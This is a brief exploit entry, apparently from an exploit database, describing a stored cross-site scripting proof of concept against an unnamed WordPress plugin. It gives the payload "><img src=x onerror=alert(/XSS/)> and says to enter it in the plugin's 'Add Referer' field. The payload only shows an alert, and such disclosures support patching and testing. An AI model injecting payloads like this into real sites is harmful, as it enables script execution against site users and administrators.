## https://sploitus.com/exploit?id=WPEX-ID:62FB399D-3327-45D0-B10F-769D2D164903 Put the following payload in the "Advanced Blocking" tab > "Block HTTP Referer's" section > "Add Referer" field: "><img src=x onerror=alert(/XSS/)>